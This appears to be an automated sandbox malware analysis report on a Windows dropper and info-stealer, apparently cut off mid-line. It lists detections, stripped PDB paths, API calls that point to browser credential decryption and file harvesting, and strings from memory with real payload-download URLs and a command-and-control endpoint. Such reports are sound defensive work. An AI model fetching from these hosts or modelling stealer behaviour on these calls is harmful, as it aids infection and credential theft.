Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	Metadefender: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	Metadefender: Detection: 24%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	ReversingLabs: Detection: 64%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr943210[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\searchEUunlim[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file4[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ferrari[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\setup[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	Joe Sandbox ML: detected

Source: 15.2.arnatic_3.exe.23e0e50.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.0.arnatic_4.exe.d30000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 15.0.arnatic_3.exe.23e0e50.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 15.3.arnatic_3.exe.2480000.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.arnatic_3.exe.23e0e50.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040E9C8 _memset,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	15_2_0040E9C8
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040EB60 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	15_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040EBC3 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,	15_2_0040EBC3
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040ECDA _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,	15_2_0040ECDA

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\xexic.pdb source: arnatic_5.exe, 00000013.00000003.386971497.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.384363344.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373506054.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.375268701.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: G:\MyProject\StreetPlayer\ExtraProgram\DropTarget\x64\Release_EXE\DTDrop64.pdb source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp
Source:	Binary string: C:\takibowuhawas\zoka_xuruj\wuxed.pdb source: arnatic_5.exe, 00000013.00000003.373008882.0000000007B30000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.491623122.0000000007B30000.00000004.00000001.sdmp
Source:	Binary string: L9C:\lucuwukib-75\namaletubo\xuyife.pdb source: arnatic_2.exe, 0000000D.00000000.299207441.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: C:\jejenos75 sic-fopotepumazok\katikame.pdb source: arnatic_5.exe, 00000013.00000003.374716400.0000000007A9B000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389718434.0000000007B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.374635601.0000000007A79000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.408864251.0000000007D11000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: C:\lucuwukib-75\namaletubo\xuyife.pdb source: arnatic_2.exe, 0000000D.00000000.299207441.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: -C:\hapatepo_jaga\pulaciyegac\96\le.pdbhQE source: arnatic_5.exe, 00000013.00000003.375452967.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.387311684.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389485856.0000000007C48000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373829127.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.372599132.0000000007A99000.00000004.00000001.sdmp
Source:	Binary string: C:\zulopif-hafos\90-ligis45-mejixaran54-kosoyidal yeducobe79\sabuzo.pdb source: arnatic_5.exe, 00000013.00000003.456363826.0000000006583000.00000004.00000001.sdmp
Source:	Binary string: C:\ruri weteveruj-57 picomamodige\secobud\nikume\hocu\f.pdb source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp
Source:	Binary string: _C:\xexic.pdbh source: arnatic_5.exe, 00000013.00000003.386971497.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.384363344.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373506054.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.375268701.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: C:\takibowuhawas\zoka_xuruj\wuxed.pdb source: arnatic_5.exe, 00000013.00000003.373008882.0000000007B30000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.491623122.0000000007B30000.00000004.00000001.sdmp
Source:	Binary string: C:\zulopif-hafos\90-ligis45-mejixaran54-kosoyidal yeducobe79\sabuzo.pdbhqE source: arnatic_5.exe, 00000013.00000003.456363826.0000000006583000.00000004.00000001.sdmp
Source:	Binary string: C:\pasuponematuvi_misawopala\zagiw100\pivogoxahapig\99\xiv.pdb source: arnatic_5.exe, 00000013.00000003.377964607.0000000007958000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382865802.0000000007960000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.383406550.0000000007992000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.377183063.0000000007A05000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379849621.0000000007959000.00000004.00000001.sdmp
Source:	Binary string: C:\hapatepo_jaga\pulaciyegac\96\le.pdb source: arnatic_5.exe, 00000013.00000003.375452967.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.387311684.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389485856.0000000007C48000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373829127.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.372599132.0000000007A99000.00000004.00000001.sdmp
Source:	Binary string: Dx 5C:\pasuponematuvi_misawopala\zagiw100\pivogoxahapig\99\xiv.pdbh source: arnatic_5.exe, 00000013.00000003.377964607.0000000007958000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382865802.0000000007960000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.383406550.0000000007992000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.377183063.0000000007A05000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379849621.0000000007959000.00000004.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

15_2_0040A5EA

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurl.dll	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurlpp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\	Jump to behavior

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00404B47 FindFirstFileW,	1_2_00404B47
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	15_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	15_2_004625DE
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	15_2_00412D8E
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	15_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	15_2_00412F8E

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040F050
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040F0A9
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E210
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then push edi	7_2_00421220
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub edx, 01h	7_2_0041C6B0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E2A0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040D340
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E331
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E389
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E449
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E473
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then push ebp	7_2_00420400
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E410
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040F4C0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E48C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E4B0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E540
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040F560
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E5C0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then push edi	7_2_004615E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then push ebx	7_2_004615E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E645
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E610
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub esp, 1Ch	7_2_0041C6D0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub edx, 01h	7_2_0041C6B0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	7_2_0042A760
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub esp, 1Ch	7_2_004917E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E840
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040F8E0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040E8E9
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub esp, 1Ch	7_2_0041C892
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then push edi	7_2_00429A70
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_00410ACC
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040EAAC
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_00410B10
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040EB20
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040EC60
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_00498C10
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then jmp 004014E0h	7_2_0040ECD0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	7_2_00420CB0
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 4x nop then sub esp, 1Ch	7_2_00425DB3

Networking:

Yara detected onlyLogger

Show sources

Source: Yara match

File source: 0000002E.00000003.451819905.0000000000730000.00000004.00000001.sdmp, type: MEMORY

Source: unknown

Network traffic detected: IP country count 10

Source: arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.208/ferrari.exe
Source: arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.208/ferrari.exe.
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.208/ferrari.exeC:
Source: arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.208/ferrari.exee
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://185.215.113.208/ferrari.exex
Source: arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: http://2.56.59.42
Source: arnatic_5.exe, 00000013.00000003.440987271.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487645700.0000000000B49000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481455180.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	String found in binary or memory: http://2.56.59.42/33F
Source: arnatic_5.exe, 00000013.00000002.489749548.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487645700.0000000000B49000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481455180.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	String found in binary or memory: http://2.56.59.42/base/api/getData.php
Source: arnatic_5.exe, 00000013.00000003.440987271.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487645700.0000000000B49000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481455180.0000000000B49000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	String found in binary or memory: http://2.56.59.42/base/api/getData.php-3x
Source: arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: http://2.56.59.42:80/base/api/getData.php
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.29/WW/file1.exe
Source: arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: http://212.193.30.29/WW/file1.exeC:
Source: arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.29/WW/file1.exeL
Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.29/WW/file1.exed
Source: arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.29/WW/file1.exem
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 